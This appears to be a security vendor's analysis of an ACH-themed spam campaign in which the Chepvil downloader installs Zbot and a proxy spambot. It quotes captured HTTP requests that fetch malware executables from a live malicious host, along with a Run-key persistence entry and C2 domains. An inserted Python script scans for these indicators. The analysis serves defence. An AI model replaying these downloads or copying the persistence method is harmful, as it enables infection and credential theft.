Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious-looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.
ACH spam campaign from the Donbot botnet
The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password-stealing malware Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.
GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache
The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:
C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file
C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file
C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself
C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.
Zbot then attempted to connect to a randomly generated domain to contact its command and control server.
The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.
GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache
The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.
C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe
It also drops another copy of itself in the Application Data folder using the filename format KB{6 random digits}.exe.
C:\Documents and Settings\{user}\Application Data\KB117188.exe
Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
KB117188.exe = "C:\Documents and Settings\{user}\Application Data\KB117188.exe"
After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.
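The persistence described above (a Run-key value named KB{6 digits}.exe pointing into Application Data, plus an svchost.exe running from the user's TEMP folder) is simple to check for on a suspect host. The script below is an added example and is not code from the original post; it takes Run-key entries as plain (name, value) pairs so it can be run against an exported registry listing, and it also accepts the Vista-and-later AppData folder name, which is an assumption beyond the XP-era paths shown here.

```python
import re
from pathlib import PureWindowsPath

# Indicators taken from the write-up: the spambot persists through a Run-key
# value named KB{6 digits}.exe pointing into Application Data, and runs a
# second copy named svchost.exe out of the user's TEMP folder.
KB_NAME_RE = re.compile(r"^KB\d{6}\.exe$", re.IGNORECASE)
APPDATA_DIRS = {"application data", "appdata"}   # XP name plus the Vista+ name (assumption)
LEGIT_SVCHOST_DIRS = {"system32", "syswow64"}     # the only places svchost.exe belongs

def _command_path(value: str) -> PureWindowsPath:
    """Extract the executable path from a Run-key value, honouring a quoted path."""
    value = value.strip()
    if value.startswith('"') and '"' in value[1:]:
        value = value[1 : value.index('"', 1)]
    return PureWindowsPath(value)

def is_spambot_run_value(value: str) -> bool:
    """True when a Run-key value matches the KBnnnnnn.exe-in-Application-Data pattern."""
    path = _command_path(value)
    dirs = {part.lower() for part in path.parts[:-1]}
    return bool(KB_NAME_RE.match(path.name)) and bool(dirs & APPDATA_DIRS)

def is_misplaced_svchost(path: str) -> bool:
    """True for an svchost.exe that lives outside the Windows system directories."""
    p = PureWindowsPath(path)
    dirs = {part.lower() for part in p.parts[:-1]}
    return p.name.lower() == "svchost.exe" and not (dirs & LEGIT_SVCHOST_DIRS)

def scan_run_entries(entries):
    """Return the names of Run-key entries whose value matches the spambot pattern."""
    return [name for name, value in entries if is_spambot_run_value(value)]

# Constructed sample of HKCU\...\Run entries, as regedit would list them.
SAMPLE_RUN_ENTRIES = [
    ("ctfmon.exe", r"C:\WINDOWS\system32\ctfmon.exe"),
    ("KB117188.exe", r'"C:\Documents and Settings\user\Application Data\KB117188.exe"'),
    ("KB12.exe", r'"C:\Documents and Settings\user\Application Data\KB12.exe"'),
]

if __name__ == "__main__":
    print(scan_run_entries(SAMPLE_RUN_ENTRIES))   # ['KB117188.exe']
    print(is_misplaced_svchost(r"C:\Documents and Settings\user\Local Settings\Temp\svchost.exe"))  # True
```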
Instead of listening on a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query for the domain name luis-vuitton-elite[dot]com. However, if that fails, the bot attempts to connect to a randomly generated domain name.
The malware code that attempts to connect to the control server
Once connected, the proxy spambot opens a channel on port 1001 over which it sends and receives data packets from the control server.
Exchange of data between the control server and the spambot
Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.
Spam is received by the spambot from the control server and relayed to the recipients.
The command and control server’s IP address is based in Germany:
WHOIS information about the control server
This spambot’s recent spamming activity includes both pharmaceutical spam and further ACH campaigns that appear to come from NACHA.org, very similar to the one which led to this infection in the first place.
Sample spam email from the Proxy-based spambot
In conclusion, there is not much that is new in this sequence of events: a spammed-out trojan downloader triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering, and the best way to protect yourself is to be cautious.